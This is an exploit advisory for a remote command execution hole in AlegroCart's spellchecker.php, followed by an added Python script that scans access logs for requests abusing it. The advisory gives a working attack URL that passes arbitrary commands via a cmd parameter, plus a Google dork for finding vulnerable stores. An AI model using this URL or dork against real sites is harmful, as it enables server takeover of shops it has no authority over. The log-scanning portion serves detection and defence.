AlegroCart versions 1.2.7 and below suffer from a remote command execution vulnerability.
8906b8c516eca8beaffa239a56c986b687fe22e0bbea94995dd12db785b413fd
####
# Exploit Title: AlegroCart <= 1.2.7 (spellchecker.php) Remote Command Execution Vulnerability
# Author: T0x!c
# Date: 22/02/2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category: webapps
# Google Dork: intext:" Powered by AlegroCart Your Store Name © 2012"
# Vendor: http://forum.alegrocart.com/viewtopic.php?f=8&t=570
# Version: 1.2.7
# Tested on: [Windows Xp]
####
# Exploit : admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
http://localhost/Path/admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=[your command]
http://127.0.0.1/Path/admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=[your command]
shell_exec( $cmd )) {
line : 102
=================================**Algerians Hackers**=======================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Kader11000 * Kalashinkov * Over-x
(exploit-id.com) , (1337day.com) , (h4ckforu.com) , (alboraaq.com) (Dz-Team.biz)
=============================================================================================
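Added example (not part of the original advisory and not AlegroCart code): a Python check that scans web-server access logs in combined format for requests reaching the spellchecker.php path named above with a cmd query parameter. The log lines, client addresses and the /shop install prefix are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path fragment of the script named in the advisory (lower-case for matching).
SCRIPT = "/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"

# Matches the leading fields of an Apache/nginx combined-format log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def find_cmd_requests(lines):
    """Return (ip, timestamp, status, cmd value) for every request that
    reaches spellchecker.php with a 'cmd' query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m["target"])
        # Decode percent-escapes and fold case so encoded or mixed-case
        # spellings of the path are still recognised.
        path = unquote(url.path).lower()
        if SCRIPT not in path:
            continue
        params = {k.lower(): v for k, v in
                  parse_qs(url.query, keep_blank_values=True).items()}
        if "cmd" in params:
            hits.append((m["ip"], m["ts"], int(m["status"]), params["cmd"][0]))
    return hits

# Constructed sample input; /shop is an assumed install prefix.
_P = "/shop/admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/"
SAMPLE_LOG = [
    f'198.51.100.7 - - [22/Feb/2012:10:01:02 +0000] "GET {_P}spellchecker.php?cmd=whoami HTTP/1.1" 200 312',
    f'203.0.113.9 - - [22/Feb/2012:10:05:40 +0000] "GET {_P}SpellChecker%2Ephp?CMD=dir HTTP/1.1" 404 209',
    f'192.0.2.15 - - [22/Feb/2012:10:06:11 +0000] "POST {_P}spellchecker.php HTTP/1.1" 200 1840',
    '192.0.2.15 - - [22/Feb/2012:10:07:00 +0000] "GET /shop/index.php?cmd=whoami HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in find_cmd_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a cmd value sent in a POST body would not appear here; the status code in each hit shows whether the script was present and answered.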